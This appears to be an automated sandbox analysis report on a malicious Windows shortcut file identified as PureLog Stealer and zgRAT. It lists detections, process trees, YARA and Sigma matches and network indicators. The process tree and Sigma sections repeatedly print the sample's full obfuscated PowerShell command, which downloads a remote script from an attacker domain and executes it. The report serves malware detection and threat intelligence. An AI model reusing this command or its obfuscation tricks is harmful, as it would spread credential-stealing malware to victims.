Edit tour

Windows Analysis Report
jKSjtQ8W7O.lnk

Overview

General Information

Sample name:	jKSjtQ8W7O.lnk renamed because original name is a hash value
Original sample name:	ffb1e4d9253ed97cc381826993a8812ac6c53f7a7d01793e282fc148102bdab3.lnk
Analysis ID:	1522859
MD5:	154af2b280309c99ae116841e1db5474
SHA1:	db66323cd296d1571b8c1816c2fbefb474112e5e
SHA256:	ffb1e4d9253ed97cc381826993a8812ac6c53f7a7d01793e282fc148102bdab3
Tags:	lnkSideWinderuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Machine Learning detection for sample

Obfuscated command line found

Performs DNS queries to domains with low reputation

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Uses nslookup.exe to query domains

Uses ping.exe to check the status of other devices and networks

Windows shortcut file (LNK) contains suspicious command line arguments

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 3040 cmdline: "C:\Windows\system32\PING.EXE" www.ministryof.gov.pk MD5: 2F46799D79D22AC72C241EC0322B011D)

nslookup.exe (PID: 3800 cmdline: "C:\Windows\system32\nslookup.exe" www.Elpson.com MD5: F2E3950C1023ACF80765C918791999C0)

nslookup.exe (PID: 4136 cmdline: "C:\Windows\system32\nslookup.exe" www.mproton.com MD5: F2E3950C1023ACF80765C918791999C0)

chrome.exe (PID: 3160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1892,i,10163335198657100473,3974397654279076089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

powershell.exe (PID: 7656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)

svchost.exe (PID: 764 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x7acec:$s1: file:/// 0x7abd8:$s2: {11111-22222-10009-11112} 0x7ac7c:$s3: {11111-22222-50001-00000} 0x73bb5:$s4: get_Module 0x74022:$s5: Reverse 0x7a1b1:$s6: BlockCopy 0x7a32e:$s7: ReadByte 0x7acfe:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: powershell.exe PID: 6588	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2604:$b2: ::FromBase64String( 0x2ce1:$b2: ::FromBase64String( 0xb26a5:$b2: ::FromBase64String( 0xb27a6:$b2: ::FromBase64String( 0xc98ce:$b2: ::FromBase64String( 0xca629:$b2: ::FromBase64String( 0x12952d:$b2: ::FromBase64String( 0x129629:$b2: ::FromBase64String( 0x2891ce:$b2: ::FromBase64String( 0x289331:$b2: ::FromBase64String( 0x151cc:$s1: -join 0x222a1:$s1: -join 0x25673:$s1: -join 0x25d25:$s1: -join 0x27816:$s1: -join 0x29a1c:$s1: -join 0x2a243:$s1: -join 0x2aab3:$s1: -join 0x2b1ee:$s1: -join 0x2b220:$s1: -join 0x2b268:$s1: -join
Process Memory Space: powershell.exe PID: 7656	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x30ff3:$b2: ::FromBase64String( 0x4bf137:$b2: ::FromBase64String( 0x5418e0:$b2: ::FromBase64String( 0x49d3c:$s1: -join 0x56fa6:$s1: -join 0x5a468:$s1: -join 0x5ab02:$s1: -join 0x5c5fe:$s1: -join 0x5e852:$s1: -join 0x5f079:$s1: -join 0x5f8d4:$s1: -join 0x6000f:$s1: -join 0x60041:$s1: -join 0x60089:$s1: -join 0x600a8:$s1: -join 0x608f9:$s1: -join 0x60a75:$s1: -join 0x60aed:$s1: -join 0x60b80:$s1: -join 0x60de6:$s1: -join 0x62f86:$s1: -join
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.powershell.exe.1985268eeb0.4.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
10.2.powershell.exe.1985268eeb0.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.powershell.exe.1985268eeb0.4.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x78eec:$s1: file:/// 0x78dd8:$s2: {11111-22222-10009-11112} 0x78e7c:$s3: {11111-22222-50001-00000} 0x71db5:$s4: get_Module 0x72222:$s5: Reverse 0x783b1:$s6: BlockCopy 0x7852e:$s7: ReadByte 0x78efe:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
10.2.powershell.exe.1985ae70000.6.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
10.2.powershell.exe.1985ae70000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.powershell.exe.1985ae70000.6.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x78eec:$s1: file:/// 0x78dd8:$s2: {11111-22222-10009-11112} 0x78e7c:$s3: {11111-22222-50001-00000} 0x71db5:$s4: get_Module 0x72222:$s5: Reverse 0x783b1:$s6: BlockCopy 0x7852e:$s7: ReadByte 0x78efe:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
10.2.powershell.exe.1985ae70000.6.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
10.2.powershell.exe.1985ae70000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.powershell.exe.1985ae70000.6.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x7acec:$s1: file:/// 0x7abd8:$s2: {11111-22222-10009-11112} 0x7ac7c:$s3: {11111-22222-50001-00000} 0x73bb5:$s4: get_Module 0x74022:$s5: Reverse 0x7a1b1:$s6: BlockCopy 0x7a32e:$s7: ReadByte 0x7acfe:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
10.2.powershell.exe.1985268eeb0.4.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
10.2.powershell.exe.1985268eeb0.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.powershell.exe.1985268eeb0.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x7acec:$s1: file:/// 0x7abd8:$s2: {11111-22222-10009-11112} 0x7ac7c:$s3: {11111-22222-50001-00000} 0x73bb5:$s4: get_Module 0x74022:$s5: Reverse 0x7a1b1:$s6: BlockCopy 0x7a32e:$s7: ReadByte 0x7acfe:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, ProcessId: 6588, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, ProcessId: 6588, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 764, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: jKSjtQ8W7O.lnk

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Machine Learning detection for sample

Source: jKSjtQ8W7O.lnk

Joe Sandbox ML: detected

Source: https://pmo.gov.pk/site/404

HTTP Parser: No favicon

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49728 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 203.101.184.118:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.8:49732 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\System.pdb( source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: klib.pdbx source: powershell.exe, 0000000A.00000002.1693221030.000001985AA88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Adobe.pdb source: powershell.exe, 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660114048.0000019842360000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb,4@v source: powershell.exe, 0000000A.00000002.1660114048.0000019842427000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ,.pdb source: powershell.exe, 0000000A.00000002.1660114048.0000019842427000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb4 source: powershell.exe, 0000000A.00000002.1693221030.000001985AA88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 0000000A.00000002.1660114048.0000019842360000.00000004.00000020.00020000.00000000.sdmp

Networking

Performs DNS queries to domains with low reputation

Source:

DNS query: ministryofficedownloadcloudserver.screenpont.xyz

Uses nslookup.exe to query domains

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.com	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.com	Jump to behavior

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.ministryof.gov.pk

Source: global traffic

HTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: i9F8JFEBNmpiWmUy3hupXw==Sec-WebSocket-Version: 13Host: gateway.discord.gg

Source: Joe Sandbox View	IP Address: 162.159.135.234 162.159.135.234
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: CYBERNET-APCyberInternetServicesPvtLtdPK CYBERNET-APCyberInternetServicesPvtLtdPK
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49728 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.18
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.18
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.18
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.18
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.57.18
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET //78/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ministryofficedownloadcloudserver.screenpont.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /78/CKP/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ministryofficedownloadcloudserver.screenpont.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: i9F8JFEBNmpiWmUy3hupXw==Sec-WebSocket-Version: 13Host: gateway.discord.gg
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=17PBEYOcBeLvKsF&MD=KVfEnAfS HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=17PBEYOcBeLvKsF&MD=KVfEnAfS HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET //78/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ministryofficedownloadcloudserver.screenpont.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /78/CKP/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ministryofficedownloadcloudserver.screenpont.xyzConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.ministryof.gov.pk
Source: global traffic	DNS traffic detected: DNS query: 1.1.1.1.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.Elpson.com
Source: global traffic	DNS traffic detected: DNS query: www.mproton.com
Source: global traffic	DNS traffic detected: DNS query: ministryofficedownloadcloudserver.screenpont.xyz
Source: global traffic	DNS traffic detected: DNS query: pmo.gov.pk
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: gateway.discord.gg

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:58:32 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Adw%2Bq4xBey8KrRUkdZwumMc4C%2Fr%2FjYjlCM8dj92YIgwxoCDjQ0vx5ywEB7jDbdrX8w5%2BIaW21p%2FAQmWWs%2BPnQH%2BCAKsTowQvIkNItjzagRsLnjJzSNXIeNNuvISMrvCoTSLu3w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8cb5c2226fac0f41-EWR

Source: powershell.exe, 00000000.00000002.4013626129.0000028DAD51F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.4012171088.0000028DAD380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftf
Source: svchost.exe, 00000008.00000002.3952244849.000001B07849E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000008.00000002.3952244849.000001B078460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2155944682.000001B078212000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
Source: svchost.exe, 00000008.00000002.3952244849.000001B078460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 00000008.00000002.3951620956.000001B07842C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3952244849.000001B078460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
Source: svchost.exe, 00000008.00000002.3952244849.000001B078460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
Source: edb.log.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
